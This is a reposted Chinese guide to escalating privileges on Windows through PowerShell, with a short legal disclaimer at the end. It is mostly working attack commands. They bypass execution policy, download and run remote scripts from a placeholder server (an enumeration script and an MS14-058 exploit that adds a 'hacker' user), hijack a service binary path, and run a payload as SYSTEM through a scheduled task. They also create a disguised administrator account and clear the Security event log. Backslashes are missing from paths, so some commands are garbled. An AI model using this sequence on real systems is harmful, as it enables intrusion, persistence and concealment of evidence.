需要先拥有普通用户权限的PowerShell执行环境。也就是说你要在对方系统里至少有一个普通用户可以登录,并拥有PowerShell执行环境。
详细介绍一下Get-ExecutionPolicy
🏆
Get-ExecutionPolicy -List
🏆
Set-ExecutionPolicy Bypass -Scope Process -Force
该命令用于在当前PowerShell会话中临时绕过脚本执行限制,允许运行任意脚本文件(包括未签名和第三方脚本),但不会修改系统全局执行策略。
🥇
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" # 获取系统版本信息
🍰
IEX (New-Object Net.WebClient).DownloadString('http://<服务器>/jaws-enum.ps1')
Invoke-JAWS -EnumAll # 自动收集系统配置、服务、文件权限等关键信息4
|
创建一个 System.Net.WebClient 对象,这个对象可以用于与Web资源进行交互,包括从Web服务器下载数据
|
.DownloadString('http://<服务器>/jaws-enum.ps1')
|
调用 WebClient 对象的 DownloadString 方法,从指定的URL(http://<服务器>/jaws-enum.ps1 )下载文件内容,并将其作为字符串返回。这里的 <服务器> 应该替换为实际的服务器地址
|
|
即 Invoke-Expression 的别名,它的作用是将字符串作为PowerShell命令来执行。所以,IEX (New-Object Net.WebClient).DownloadString('http://<服务器>/jaws-enum.ps1') 就是把从指定URL下载的脚本内容当作PowerShell命令来执行
|
🏆
Import-Module .Sherlock.ps1 #将当前目录下名为 Sherlock.ps1 的脚本文件作为模块导入到当前的 PowerShell 会话中。
Find-AllVulns # 检测系统已知漏洞(CVE编号)
🎁
Get-WmiObject win32_service | Select-Object Name, PathName, State | Where-Object {$_.PathName -notlike "C:Windows*"}
💡
1.筛选逻辑
获取所有Windows服务信息(Win32_Service类)2
筛选PathName字段不以C:Windows开头的服务(通常为第三方或可疑服务)
2.输出内容
显示服务名称、路径、运行状态三列Name | PathName | State
⛱️
sc.exe config "<漏洞服务名>" binPath= "C:exploitdllhijack.dll"
sc.exe start "<漏洞服务名>" # 通过服务重启触发4
📚
IEX (New-Object Net.WebClient).DownloadString('http://<服务器>/ms14-058.ps1')
Invoke-MS14058 -Command "net user hacker P@ssw0rd /add" 5
🥇
schtasks /create /tn "UpdateTask" /tr "C:exploitpayload.exe" /sc onstart /ru SYSTEM /f
schtasks /run /tn "UpdateTask" 6
🏖️
New-LocalUser -Name "Support" -Password (ConvertTo-SecureString "P@ssw0rd123" -AsPlainText -Force) -FullName "IT Support" -Description "System support account"
Add-LocalGroupMember -Group "Administrators" -Member "Support" 2
🏖️
Remove-ItemProperty -Path "HKLM:SOFTWAREMicrosoftWindowsCurrentVersionRun" -Name "恶意启动项"
Clear-EventLog -LogName Security 4
原文始发于微信公众号(运维星火燎原):PowerShell权限提升操作指南
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
点赞
http://cn-sec.com/archives/4143849.html
复制链接
复制链接
-
左青龙
- 微信扫一扫
-
-
右白虎
- 微信扫一扫
-
评论